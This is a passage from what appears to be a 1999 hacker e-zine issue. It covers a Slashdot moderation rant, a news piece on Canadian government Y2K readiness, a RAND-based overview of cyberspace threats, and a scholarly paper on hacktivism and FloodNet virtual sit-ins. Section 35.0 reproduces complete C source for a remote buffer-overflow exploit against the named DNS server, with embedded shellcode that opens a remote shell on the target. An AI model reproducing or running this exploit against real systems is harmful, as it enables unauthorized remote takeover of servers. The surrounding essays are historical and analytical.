tax incentives. It moves Slashdot to the suburbs. Now posts are judged worthy or not-worthy. Instead
of simply ignoring idiots, they are now branded with a negative sign. And worst of all, dissenting
opinions, some with good points, are being downgraded as well. If you experiment with the moderation
on 2 or 3, you get all these earnest well-written posts that remind me of church ladies' conversation
at a quilting bee. Ugh! And if you view the posts by ranked order, the organic flow is cut to bits...
no longer can you see how one point flows into another and how you got from A to Z. Is this progress?
Is this what web discussion is about? No matter how much advetisers wish it so, you cannot pin down a
posting community. You can't expect them to all know English in the first place and you certainly can't
expect them to be of the same mind when they are of every age and experience level in the book. Why then
try to moderate them? Why are so many people congratulating Slashdot on cutting down on "the noise"?
Why is it judged "noise" at all? I don't see it as noise...I may skim it instead of reading it, but I
can't tell you how many times a well-placed, off-topic post has made my day. I don't want to read only
the standard opinion on any topic and IMO that is the big pitfall with moderation. I want ALL the sights
and smells of the bazaar, Times Square, the big city...from garbage to haute cuisine...not merely the
blandness of a made-to-order, frozen-dinner, must-see-TV suburb. Why? Because in my case, it is the
posters who have nailed my mistakes, cursed me a blue streak, and even made me cry from whom I have
learned the most. They have forced me to re-evaluate my opinions and restate my thoughts. They have
taught me and by their hard words helped me to grow. And, they have become friends.
So what should Slashdot do instead? A few ideas:
1. Set the default to all-posts-viewed. If I'm not logged in or am new, let me see Slashdot in all its
raging glory and then let me decide if I want to choose moderation.
2. I can't prove this might help with the "noise", but I think having a Threads area as opposed to posts
being on the same page as the article might naturally eliminate some problems. That way, people who
really felt inspired to say something would click on a link at the end of the article to a thread
discussing the issue at hand. There wouldn't be the vanity of being "seen" so much, which leads to
First Posts! and the like.
3. If you must moderate, have a time limit on moderation, random selection of moderators, and a constant
turnover on who is moderating among your registered users. This will eliminate some of the cronyism that
has already occured due to the 400+ being selected by the original group.
4. Learn to love the flames. Certainly don't worry about Katz flames-- we gave him total hell on HotWired.
It's a tradition. Flames are instructional, even if you don't like what they're teaching you.
5. Many posters seem to flame when there are articles that they don't feel are hard-core Slashdot. So how
about a separate page for those articles? The front page would be all the "News for Nerds" and you could
have a link to something like "The Rest of the World" which would be the same setup but with different
articles (and a place for Katz).

When it's all said and done, if Rob wants to morph Slashdot threads into a university-like moderated discussion, it's his call. Either way, I'll still be reading Slashdot. But to me, what makes Slashdot great is its many passionate voices, not a few well-written posts.
Who needs the surburbs?...Give me that funk!


@HWA


34.0 Canada rolls into the fiscal new millennium with a steady eye on its govt mainframes....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Canada Rolls into Fiscal 2000
by Matt Friedman

9:30 a.m. 1.Apr.99.PST
MONTREAL -- Civil servants here were watching their computer monitors closely Thursday.

Canada's federal government began its fiscal year today, marking the first time such a year will include dates in the
year 2000. If Ottawa is going to be bitten by the millennium bug, this is when the problems might start showing up.

The government says it's ready.

"April 1 is hardly a surprise for us," said Paul Walsh, a spokesman for the federal Department of Public Works and
Government Services.

"We have been doing compliance testing for the beginning of the fiscal year and for all of the other key days leading up
to and after January 1, 2000."


Those trouble dates include New Year's Day itself, the start of the new fiscal year, and 9 September 1999 (the ninth
day of the ninth month of 1999). Ottawa has also tested for 7 April 1999 -- the 99th day of 1999 -- and for 29
February and 1 March 2000. The first year of the 21st century is a leap year, while the first year of the 20th century
was not.

In any case, Canada will survive. If Y2K problems do arise, they will surface in financial reporting and management
systems. Department and program managers may not have correct budget information, or may not be able to allocate
funds. Walsh says that won't happen.

"We have tested all government-wide, mission-critical systems," Walsh said. "We ran the systems on mainframes,
simulating different dates. And we tested all of the key dates, so we know that 1 April or any other date isn't an issue.
Any problems would already have shown up in testing."


Joe Boivin, president of the Ottawa-based Global Millennium Foundation, has been critical of the Canadian government's
Y2K efforts. However, he says that, for the most part, Ottawa has its house in order.
"The truth is, that anyone can see if there's going to be a problem by advancing dates in a spreadsheet," Boivin said.
"It's not a difficult testing issue, and Ottawa has been testing."

"The truth is that the government is one of the world leaders on this."

The federal body that has been auditing the compliance process agrees. Though it is cautiously optimistic, the Office
of the Auditor General (OAG) warns that there could still be problems.

"No one would claim that everything is all right at this point," said Nancy Cheng, a principal with the OAG's Audit
Operations Branch. "The government is hoping to have everything done by June. It has taken the issue seriously, and
there has been tremendous progress, but there will be glitches. It's just not clear whether they'll be visible to the
public."


However, for all the planning and testing, Boivin remains skeptical that the Canadian government has covered all the
bases. Some things are just going to fall through the cracks, he said.

"The government report has high completion numbers, but they still haven't implemented compliance in a production
environment,"
Boivin said.

"You may have 90 percent of the job done, but it's the last 10 percent, when you get into the real-time world versus
hopeful thinking and careful planning, that will give you problems. Anyone who has ever worked in a production
environment can tell you that."


The biggest problems could stem from what Cheng called "interface issues," when government departments interact
with business partners or with the provincial governments, many which are far behind Ottawa in their compliance
efforts.

"The government has a lot of partners in the public and private sectors, and a lot of them are at different stages of
compliance,"
she said. "That makes it difficult to know for sure, how prepared we really are."

"If Canada has an Achilles' heel, it's that we have a lot of people doing things at various levels of government and in
the private sector, but we don't have a national Y2K coordinator,"
Boivin says. "Even if Ottawa is in good shape, there
are the provinces -- and the municipalities aren't even at the 50 percent mark in compliance implementation and
testing."


The Treasury Board of Canada's monthly Y2K progress report will be available on the board's Web site. The auditor
general plans a third audit of federal Y2K readiness in June. This time, however, Cheng says that her department will
have a special focus on federal contingency plans.


@HWA


35.0 More exploits from the ADM crew
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE FROM THE ADM CREW
*
* named_v3.c improved linux x86 named 4.9.6-REL exploit
* by plaguez aka ndubee.
* thanks to napster, and prym for the shellcode
*
*/


#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#include <getopt.h>


#define NOP 0x90
#define WAITPORT 10752


char buff[10000];

char c0de[] =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
"\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
"\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
"\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
"\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
"\xb3\x04\xcd\x80\xeb\x04\xeb\x4a\xeb\x50\x31\xc0\x89\x46\x04\x89"
"\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
"\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb8\x2f\x62\x69"
"\x6e\x89\x06\xb8\x2f\x73\x68\x21\x89\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5d\xff\xff\xff";

char shellcode[500];


void handle_alarm(sn)
int sn;
{
alarm(0);
signal(SIGALRM, SIG_DFL);
printf("Unable to connect: Connection timed out\n");
exit(0);
}


void addchar(char *str, char ch)
{
unsigned int len;

len = strlen(str);
str[len] = ch;
str[len + 1] = 0;
}


int ConnectServer(char *host, int port)
{
int sockdesc;
struct sockaddr_in sin;
struct hostent *he;

sin.sin_port = htons(port);
sin.sin_family = AF_INET;

he = gethostbyname(host);
if (he) {
memcpy((caddr_t) & sin.sin_addr.s_addr, he->h_addr, he->h_length);
} else {
printf("Error: gethostbyname(): Unable to resolve [%s]\n", host);
exit(-1);
}

if ((sockdesc = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("Error: socket()");
exit(-1);
}
if (connect(sockdesc, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
perror("Error: connect()");
exit(-1);
}
return sockdesc;
}

void MultiplexConnection(int sockdesc)
{
int ret;
char sockbuf[2048];
fd_set readfds;

while (1) {
FD_ZERO(&readfds);
FD_SET(0, &readfds);
FD_SET(sockdesc, &readfds);
select(255, &readfds, NULL, NULL, NULL);

if (FD_ISSET(sockdesc, &readfds)) {
memset(sockbuf, 0, 2048);
ret = read(sockdesc, sockbuf, 2048);
if (ret <= 0) {
printf("Connection closed by foreign host.\n");
exit(-1);
}
printf("%s", sockbuf);
}
if (FD_ISSET(0, &readfds)) {
memset(sockbuf, 0, 2048);
read(0, sockbuf, 2048);
write(sockdesc, sockbuf, 2048);
}
}
}


int lookup_host(ra, hn, rp)
struct sockaddr_in *ra;
char *hn;
unsigned short rp;
{
ra->sin_family = AF_INET;
ra->sin_port = htons(rp);
if ((ra->sin_addr.s_addr = inet_addr(hn)) == -1) {
struct hostent *he;

if ((he = gethostbyname(hn)) != (struct hostent *) NULL) {
memcpy(&ra->sin_addr.s_addr, he->h_addr, 4);
return 1;
} else
herror("Unable to resolve hostname");
} else
return 1;
return 0;
}

void attack_bind(ra, loc)
struct sockaddr_in ra;
char *loc;
{
int sd, pktlen, sockdesc;
char keypkt[6000], rname[6000];
struct hostent *he;


if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("cannot open tcp socket");
return;
}
printf("Connecting to nameserver via TCP..");
fflush(stdout);
signal(SIGALRM, handle_alarm);
alarm(15);
if (connect(sd, (struct sockaddr *) &ra, sizeof(ra)) == -1) {
perror("Unable to connect");
close(sd);
return;
}
printf(".done.\n");
alarm(0);

if ((he = gethostbyaddr((char *) &ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *) NULL)
sprintf(rname, "%s", inet_ntoa(ra.sin_addr));
else
strncpy(rname, he->h_name, sizeof(rname));


pktlen = make_keypkt(keypkt);
send_packet(sd, keypkt, pktlen);
close(sd);

printf("Attente connexion...\n");
fflush(stdout);
sleep(5);
sockdesc = ConnectServer(loc, WAITPORT);


printf("Shell found! Free to execute commands suffixed with a ';'\n");
MultiplexConnection(sockdesc);
close(sockdesc);

exit(-1);

}


int make_keypkt(pktbuf)
char *pktbuf;
{
HEADER *dnsh;
char *ptr = pktbuf;
int pktlen = 0;
unsigned long ttl = 31337;


memset(pktbuf, 0, sizeof(pktbuf));

/* fill the dns header */
dnsh = (HEADER *) ptr;
dnsh->id = htons(rand() % 65535);
dnsh->qr = 0;
dnsh->opcode = IQUERY;
dnsh->aa = 0;
dnsh->tc = 0;
dnsh->rd = 1;
dnsh->ra = 1;
dnsh->unused = 0;
/* removed for portability (it's zero already)
dnsh->pr = 0;
*/

dnsh->rcode = 0;
dnsh->qdcount = htons(0);
dnsh->ancount = htons(1);
dnsh->nscount = htons(0);
dnsh->arcount = htons(0);
pktlen += sizeof(HEADER);
ptr += sizeof(HEADER);
/* this is the domain name (nothing here) */
*(ptr++) = '\0';
pktlen++;
/* fill out the rest of the rr */

PUTSHORT(T_A, ptr);
PUTSHORT(C_IN, ptr);
PUTLONG(ttl, ptr);
PUTSHORT((strlen(buff) + 1), ptr);

memcpy(ptr + 1, buff, strlen(buff) + 1);
ptr = ptr + (strlen(buff) + 1);

pktlen += ((sizeof(short) * 3) + sizeof(long) + (strlen(buff) + 1));

return pktlen;
}

int send_packet(sd, pktbuf, pktlen)
int sd, pktlen;
char *pktbuf;
{
char tmp[2], *tmpptr;

tmpptr = tmp;
PUTSHORT(pktlen, tmpptr);
if (write(sd, tmp, 2) != 2 || write(sd, pktbuf, pktlen) != pktlen) {
perror("write failed");
return 0;
}
return 1;
}


void usage(char *pname)
{
printf("\nUsage:\t%s targethost [offset]\n", pname);
printf("\ttargethost may either be name or ip.\n\n");
}

void main(argc, argv)
int argc;
char *argv[];
{
int i;
struct sockaddr_in ra;
char *ptr;
char *endbuff;
unsigned long addr;
unsigned char jmp;

int offset = 2750; /* 2200 --> 3500 */
int bsize = 1536;

if (argc < 2) {
usage(argv[0]);
exit(1);
}
if (argc == 3)
offset += atoi(argv[2]);


strcpy(shellcode, c0de);


addr = 0xbffffff0 - offset;

printf("longueur shellcode : %i\n", strlen(c0de));
printf("taille buffer %i\n", bsize);
printf("offset %i\n", offset);
printf("adresse: 0x%lx\n", addr);

endbuff = buff + bsize;

for (ptr = buff; ptr < (endbuff - strlen(shellcode) - 8); ptr++)
*ptr = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
*((long *) ptr) = addr - 16;
*((long *) (ptr + 4)) = addr;
*(ptr + 9) = 0;

if (!lookup_host(&ra, argv[1], NAMESERVER_PORT))
return;

srand(time(NULL));
attack_bind(ra, argv[1]);
}


=------------------------------------------------------------------------------------------------=


@HWA


*********************************************************************************************************************
* =--------------------------------------------------------------------= *
* *
* Special Section: Online civil disobedience and hacktivism *
* *
* =--------------------------------------------------------------------= *
*********************************************************************************************************************

SP.00 Intro article
~~~~~~~~~~~~~

That Wild, Wild Cyberspace Frontier

Cyberspace, like the old West, is a lawless domain of limitless possibilities--for good but also for evil. As in a frontier town, everyone with links to the
Internet is going to have to see to their own protection, at least until law and order catch up.

A Russian hacker in St. Petersburg breaks into a Citibank computer system in New York and steals more than $10 million by electronically transferring the money to
other banks around the world. Improbable? Not at all--the only remarkable aspect of the affair is that the hacker was caught and the case became public when
Citibank requested his extradition. Banks try to keep such thefts under wraps because of the bad publicity, but security experts estimate that about 36 instances of
computer intruders stealing sums of more than $1 million occur each year in Europe and the United States.

And that is just the tip of an iceberg of real and potential, civil and military, deliberate and accidental threats to the global web of interlinked computers and
communications systems. In the headlong rush to "connect," little attention is being paid to gaping holes in the security of these information networks, according to
RAND researchers Richard O. Hundley and Robert H. Anderson. "This is everybody's problem, and therefore nobody's problem; it falls through all the cracks,"
they write in Security in Cyberspace: An Emerging Challenge for Society.

The authors provide a tour of the cyberspace frontier and of the "bad guys" and dangers lurking there. They also sketch a plan to bring a modicum of order and
security to this chaotic, rapidly expanding, and essentially lawless territory.

From Printed Page to Cyberspace

More and more informational activities are going digital and electronic, they point out, with these versions often supplanting all paper records. This is true of
educational activities, the holdings of libraries, the process and results of research, engineering designs and industrial processes, the various mass information and
entertainment media (newspapers, television, movies, etc.), and all manner of private and public records.

Also moving from the printed page into cyberspace are transactional activities, involving myriad commercial business and financial transactions, the operations of
governments at all levels, political activities, and both public and private social interactions.

Activities involving the operation and control of essential physical and functional infrastructures--power grids, air traffic control systems, telecommunications and
the like--are increasingly shifting from mechanical/electrical control to electronic/software control.

And the connectivity between information systems that is at the heart of cyberspace is spreading worldwide and becoming more and more universal, with millions of
new entry points every year.

These loosely protected information networks can be attacked in a variety of ways, for a variety of purposes, the authors note: to insert false data, to steal, change or
destroy data and programs, and to disrupt, manipulate or control a system's performance. Many of these types of attack have already occurred. Two notable
examples are the "Internet Worm," which disrupted activities on the Internet in 1988, and the "Hannover Hacker," who stole information from computer files all over
the world during 1986-1988 and sold it to the KGB.

All of these hostile actions can be done surreptitiously and many can be done remotely, at a great distance from the target, via a series of interlinked computers.

Malevolent acts are not the only worry; information systems operating in cyberspace can also be brought down unintentionally. Instances of this range from a farmer
accidentally cutting a fiber-optic cable while burying a dead cow (which closed four major air-traffic control centers for over five hours in May 1991) to the software
error that caused a major breakdown in AT&T long distance service in 1992.

Who Are the Potential Villains?

The explosive expansion of cyberspace activities gives rise to a new set of vulnerabilities--for governments, the military, businesses, individuals and society as a
whole--that can be exploited by a wide spectrum of "bad guys" for a variety of motives, Hundley and Anderson contend. These include hackers, disgruntled
employees, criminals, terrorists, commercial organizations, and nations. The case of hacker Kevin Mitnick provides some insight into the first type. He led authorities
on a high-speed chase through cyberspace after lifting 20,000 credit card numbers from various computer systems. Mitnick did not try to cash in on the ill-gotten
bonanza, apparently more interested in thrills than profits, and was caught only after deliberately provoking the attention of a top computer security expert. Mitnick
hacked into the files of Tsutomu Shimomura, who then tracked him down for authorities.

The resources required to cause harm in this cyberspace world are relatively small: one (or at most a few) computer experts with computer terminals hooked into the
worldwide network can do considerable damage. The resources required for a nation or group to do significant damage to the military, economy, or society of
another nation are larger, but far fewer than those required to acquire and use major weapon systems. The preparations can also be well hidden, if done carefully. As
more and more people become "computer smart" and as villains of many different stripes become more and more aware of the opportunities for mayhem in
cyberspace, the resources for major attacks could be within the reach of many nations and some malevolent groups.

To further complicate matters, cyberspace attacks mounted by these different actors are indistinguishable from each other, as are attacks mounted by domestic and
foreign-based perpetrators, insofar as the perceptions of the victims are concerned. The distinction between "crime" and "warfare," "accident" and "attack," becomes
blurred as does the distinction between police and military responsibilities.

In the authors' view, the danger of more (and more serious) threats in cyberspace is multiplying alarmingly. Statistics support their concern. The number of reported
(many incidents go unreported) Internet penetrations rose from six in 1988 to 1,172 in the first six months of 1994. So far, at least, no major disasters have
occurred, but the potential certainly exists. For example, it might be possible in the future for some perpetrators (nations or major terrorist groups) to inflict
substantial damage by bringing d

own key parts of the nation's air traffic control system, or the electric power grid, or the international monetary transfer system, even 
if for a limited time.

Nor is a military disaster out of the question. If an enemy cyberspace attack disrupted a vital military logistics system, or the telecommunications network on which it
depends, for a critical period during a campaign, the campaign could be jeopardized.

But taming this wild frontier won't be easy. In addition to the chaotic growth of cyberspace and the blurring of lines of local, national and international authority over
activities conducted there, the authors identify another problem. Many individual users neither understand nor accept the need for communal responsibility in
safeguarding cyberspace.

In suggesting the elements of a strategy for cyberspace security, Hundley and Anderson draw on a familiar metaphor. Like frontier towns, let each local enclave
(business, university, research organization, government agency) see to its own protection, at least for the present, relying on available computer security software
and firewalls (security strategies that control electronic access by outsiders but allow insiders, who presumably are trustworthy, to travel the information highways
and byways with comparative freedom). But these are little more than stopgap measures, the authors conclude. Barring a technological breakthrough that is not now
on the horizon, effective control of cyberspace will require a combination of laws, regulations, the education and training of users, and the cooperation of countries
worldwide.


Security in Cyberspace: An Emerging Challenge for Society, by Richard O. Hundley and Robert H. Anderson, 1994.


SP.01 Article 1:"Electronic Civil Disobedience and the World Wide Web of Hacktivism: "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Electronic Civil Disobedience and the World Wide Web of Hacktivism:
A Mapping of Extraparliamentarian Direct Action Net Politics

_____________________

Stefan Wray

Source:http://www.freespeech.org/resistance/texts/hacktivism.html


Introduction

In the next century, when cyber-historians look back to the 1990s, they will recognize 1995 as the year of the graphical browser, the
year the Internet began to be overshadowed by the Web. But they will probably also view 1998 as an important moment -- in the history
of the browser wars. At a minimum, 1998 will be noted for the emergence of two terms that represent similar phenomena: electronic
civil disobedience and hacktivism. In that year, a Net based affinity group called the Electronic Disturbance Theater pushed and
agitated for new experimentation with electronic civil disobedience actions aimed mostly at the Mexican government. It engaged its
FloodNet software and invited participation to an international set of artists, digerati, and political activists to make a "symbolic gesture" in
support of Mexico's Zapatistas. While at the same time, in Britain, in Australia, in India, in China, on almost every continent there were
reports of hacktivity. In the spring of 1998, a young British hacker known as "JF" accessed about 300 web sites and placed anti-nuclear
text and imagery. He entered, changed and added HTML code. At that point it was the biggest political hack of its kind. Since then, and
increasingly over the course of the year, there were numerous reports of web sites being accessed and altered with political content.

Taken together we may consider both the more symbolic electronic civil disobedience actions and the more tangible hacktivist events
under the rubric of extraparliamentarian direct action Net politics, where extraparliamentarian is taken to mean politics other than
electoral or party politics, primarily the grassroots politics of social movement. By no means was 1998 the first year of the browser wars,
but it was the year when electronic civil disobedience and hacktivism came to the fore, evidenced by a front page New York Times
article on the subject by the end of October. Since then the subject has continued to move through the media sphere. 1

What this paper attempts to do is examine these emerging trends from a slightly wider angled lens. This paper puts forth five portals for
consideration: computerized activism, grassroots infowar, electronic civil disobedience, politicized hacking, and resistance to
future war. At first they were conceived as five portals into Hacktivism, but perhaps they better serve as five portals for looking at the
wider world of extraparliamentarian direct action Net politics, although that phrase is admittedly awkward. Nevertheless, these five
portals seem to provide a useful starting point for a more in-depth, yet to come, examination of the convergence of activism, art, and
computer-based communication and media. In addition to starting to define, to frame, and to contextualize contemporary hacktivity, in
terms of its roots, its lateral dimension, and its trajectivity, this paper also asks some nascent questions of a political, tactical,
technological, ethical, and legal nature and makes some preliminary claims about the likely direction of these various movements.

Computerized Activism

Computerized activism exists at the intersections of politico-social movements and computer-mediated communication. The origins of
computerized activism extend back in pre-Web history to the mid 1980s. As an example, the first version of PeaceNet appeared in early
1986. PeaceNet enabled - really for the first time - political activists to communicate with one another across international borders with
relative ease and speed. 2 The advent of newsgroup services like PeaceNet, and wider dispersal of other Bulletin Board Systems, email
lists, and gopher sites characterizes the cyber-environment within which most early on-line political activists found themselves. This largely
text-based environment persisted up until as late as 1994 and 1995, when the first GUI browsers were introduced. Even today, while
Web sites augment these earlier forms, email communication remains a central device in the international circulation of struggle and the
creation and maintenance of international solidarity networks.3

During the early to mid 1980s the subject of computer-mediated communication (CMC) was taken up by scholars in, for example,
psychology and sociology. When communication scholars began to examine CMC, and in particular when they began to assess the
juncture of political communication and CMC, a number of academic treatments of "electronic democracy" were written in which politics
is positioned narrowly within the confines of electoral or parliamentarian politics. 4 Among the earliest treatments of CMC from among
communication scholars who entertain extraparliamentarian or grassroots politics is by Downing in "Computers for Political Change." 5
Not surprisingly, PeaceNet is one of his case studies. For purposes of tracing the origins of more current cross-border email exchange
and its role in creating and maintaining international solidarity networks, Downing points to PeaceNet's establishment of international links
in 1987. Among early adopters of these means of communication were people in the 1980s anti-nuclear and Central American solidarity
movements.

By the late 1980s and the very beginning of the 1990s, the significance of cross-border, international, email communication began to be
realized. The international role of email communication, coupled to varying degrees with the use of the Fax machine, was highlighted in
both the struggles of pro-democracy Chinese students and in broader trans-national movements that lead to the dissolution of the Soviet
Union. Shortly thereafter, we began to see scholarly work on this subject. Harasim’s "Global Networks: Computers and International
Communication" began to theorize about the role of international email communication in linking together the world. 6

Computerized activism remained marginal to political and social movements until the explosion of the Internet in the early to mid 1990s
and more so until the arrival of the graphical browser in 1994 and 1995. Now, in the post-Web Internet phase there is widespread use of
these media forms by a plethora of grassroots groups and other political actors in countries all over the world. 7

A common thread or understanding that runs through various types of politically based computer-mediated communication, from early
BBS systems, to email listservs, and to sophisticated Web sites with fancy bells and whistles, seems to be an overarching dominant
paradigm that privileges discourse, dialogue, discussion and open and free access. This observation becomes important when looking
more at electronic civil disobedience and politicized hacking, because it is with this dominant paradigm of the Habermasian Web that
these later forms conflict and cause friction.

So the first portal of Computerized Activism is important for understanding the roots of today’s extraparliamentarian, more direct action
focused, political CMC. It is the portal that has been with us the longest, and the portal within which most political actors on the Net feel
the most comfortable. Computerized activism, defined more purely as the use of the Internet infrastructure as a means for activists to
communicate with one another, across international borders or not, is less threatening to power than the other types of uses we see
emerging in which the Internet infrastructure is not only a means toward or a site for communication, but the Internet infrastructure itself
becomes an object or site for action. This transgression, or paradigmatic shift in thinking, of moving away from believing the Internet
solely as communication device to Internet as communication device and site for action is dealt with incrementally in the next four
sections.

Grassroots Infowar

Grassroots infowar is an intensification of computerized activism. Infowar here refers to a war of words, a propaganda war. Grassroots
infowar is the first step, the first move away from the Internet as just a site for communication and the beginning of the transformation
from word to deed. Grassroots infowar actors emerge fully cognizant they are on a global stage, telepresent across borders, in many
locations simultaneously. There exists a sense of immediacy and interconnectivity at a global level. More than a mere sharing of
information and dialogue, there is a desire to push words towards action. Internet media forms become vehicles for inciting action as
opposed to simply describing or reporting.

In the early 1990s, following the U.S. directed "smart" bombardment of Iraq and following the dissolution of the Soviet Union and the
subsequent uselessness of Cold War rhetoric as a rationalization for foreign intervention, the U.S. military-intelligence community, along
with its allies in financial-corporate sectors, needed to craft a new military doctrine. Their answer was Information Warfare and the threat
of info-terrorism. State-side scholars at RAND, a think tank in Santa Monica, California, that often does the military's "thinking", set
about devising new theoretical constructs that would lay the basis for their version of Information Warfare. In 1993, under the RAND
banner, Ronfeldt and Arquilla wrote Cyberwar is Coming! This work sets out the distinctions between netwar and cyberwar and is
cited by nearly every subsequent treatment of Information Warfare theory.8 Where netwar refers more to the war of words, the
propaganda war that exists on the Internet itself, cyberwar refers to cybernetic warfare, war dependent on computers and
communications systems, the war of C4I - Command, Control, Communication, Computers, and Information.

Not long after RAND's theoretical intervention, pragmatic cases of netwar appeared. Among the most celebrated is the case of Mexico's
Zapatistas and the international community of supporters that quickly brought that struggle on to the Internet. With the global
pro-Zapatista Internet experience there began to be a rethinking or an interrogation of RAND's theoretical constructs, albeit from a more
radical grassroots perspective. Some of this recasting has been brought forth in pieces by Harry Cleaver, a professor at the University of
Texas at Austin and key person behind the Chiapas95 project, an email-based news and information distribution service. Probably
Cleaver's most well known work in this regard is "The Zapatistas and the Electronic Fabric of Struggle." 9

Despite some radical interventions and attempts to reframe dominant forms of military and intelligence Information Warfare theory, most
of the material, not surprisingly, is produced by the likes of RAND, the National Defense University, the Department of Defense, the US
Air Force, or private sector initiatives. The meme of Information Warfare seems to have spread and been promulgated largely through
network security paranoics and others keen on guarding digital property. But there are signs that Information Warfare is spreading to
other areas. This year Information Wafare hit the international digital arts community by being the main subject of the annual Ars
Electronic Festival in Linz, Austria.9

Theorizing about grassroots or bottom-up Information Warfare doesn't nearly get as much attention as the dominant models and as a
consequence there is not much written on the subject. 11 The case of the global pro-Zapatista networks of solidarity and resistance offers
a point of departure for further examination of grassroots infowar. One feature of Zapatista experience over the course of the last 5 years
is that it has been a war of words, as opposed to a prolonged military conflict. This is not to say there isn't a strong Mexican military
presence in the state of Chiapas. Quite the contrary is true. But fighting technically ended on January 12, 1994 and since then there has
been a ceasefire and numerous attempts at negotiation.12 What scholars, activists, and journalists, on both the left and the right, have said
is that the Zapatistas owe their survival at this point largely to a war of words. This war of words, in part, is the propaganda war that has
been successfully unleashed by Zapatista leaders like Subcommandante Marcos as well as non-Zapatista supporters throughout Mexico
and the world. Such propaganda and rhetoric has, of course, been transmitted through more traditional mass communication means, like
through the newspaper La Jornada. 13 But quite a substantial component of this war of words has taken place on the Internet. Since
January 1, 1994 there has been an explosion of the Zapatista Internet presence in the forms of email Cc: lists, newsgroups, discussion
lists, and web sites.14

A primary distinction, then, between earlier forms of computerized activism and forms of grassroots infowar is in the degree of intensity.
Coupled with that is the degree to which the participants are noticed and seen as a force. Given the Zapatistas relatively high profile in
Mexican society over the course of the last five years, and given the fact that they are technically a belligerent force negotiating with a
government, the Internet activity surrounding them takes on a different significance than, say, for example, the Internet activity of the
Sierra Club, Amnesty International, or other similar ventures.

An important difference is that in grassroots infowar comes the desire to incite action and the ability to do so at a global scale. At the end
of 1997, news of the Acteal massacre in Chiapas, in which 45 indigenous people were killed, quickly spread through global
pro-Zapatista Internet networks. Within a matter of days there were protests and actions at Mexican consulates and embassies all over
the world.15 This incident, too, is now seen as a turning point in the stance by some toward the Internet infrastructure. While prior to this
moment, there had been few if any incident reports of pro-Zapatista hacktivity, following there has been a shift, the beginning of the move
toward accepting the Internet infrastructure as both a channel for communication and a site for action.

Electronic Civil Disobedience

Acting in the tradition of non-violent direct action and civil disobedience, proponents of Electronic Civil Disobedience are borrowing the
tactics of trespass and blockade from these earlier social movements and are experimentally applying them to the Internet. A typical civil
disobedience tactic has been for a group of people to physically blockade, with their bodies, the entranceways of an opponent's office or
building or to physically occupy an opponent's office -- to have a sit-in. Electronic Civil Disobedience, as a form of mass decentered
electronic direct action, utilizes virtual blockades and virtual sit-ins. Unlike the participant in a traditional civil disobedience action, an
ECD actor can participate in virtual blockades and sit-ins from home, from work, from the university, or from other points of access to
the Net. [16]

The phrase "Electronic Civil Disobedience" was coined by a group of artists and theorists called the Critical Art Ensemble. In 1994 they
published their first book that dealt with this subject, "The Electronic Disturbance," followed two years later by "Electronic Civil
Disobedience and Other Unpopular Ideas."16 Both of these works are devoted to a theoretical exploration of how to move protests from
the streets onto the Internet. They examine the tactics of street protest, on-the-ground disruptions and disturbance of urban infrastructure
and they hypothesize how such practices can be applied to the Internet infrastructure.17

Before 1998, Electronic Civil Disobedience remained largely as theoretical musings. But after the 1997 Acteal Massacre in Chiapas,
there was a shift toward a more hybrid position that views the Internet infrastructure as both a means for communication and a site for
direct action. This shift distinguishes more sharply the third portal of Electronic Civil Disobedience from the first and second portals.

Electronic Civil Disobedience is the first transgression, making Politicized Hacking the second transgression and Resistance to Future
War the third. Each succeeding transgression moves the stance toward the Internet infrastructure further away from the public sphere
model and casts it more as conflicted territory bordering on a war zone. Where the former more discursive model is perhaps a
manifestation of Habermas's Paris Salon, the later may have roots in the Boston Tea Party. 18

The realization and legitimization of the Internet infrastructure as a site for word and deed opens up new possibilities for Net politics,
especially for those already predisposed to extraparliamentarian and direct action social movement tactics. In early 1998 a small group
calling themselves the Electronic Disturbance Theater had been watching other people experimenting with early forms of virtual sit-ins.
The group then created software called FloodNet and on a number of occasions has invited mass participation in its virtual sit-ins against
the Mexican government. 19

EDT members Carmin Karasic and Brett Stalbaum created FloodNet to direct a "symbolic gesture" against an opponent's web site.
FloodNet is a Web-based Java applet that repeatedly sends browser reload commands.20 In theory, when enough EDT participants are
simultaneously pointing the FloodNet URL toward an opponent site, a critical mass prevents further entry. Actually, this has been rarely
attained. Given this, perhaps FloodNet's power lies more in the simulated threat.

On September 9, 1998, EDT exhibited its SWARM project21 at the Ars Electronic Festival on Information Warfare, where it launched a
three-pronged FloodNet disturbance against web sites of the Mexican presidency, the Frankfurt Stock Exchange, and the Pentagon, to
demonstrate international support for the Zapatistas, against the Mexican government, against the U.S. military, and against a symbol of
international capital.22

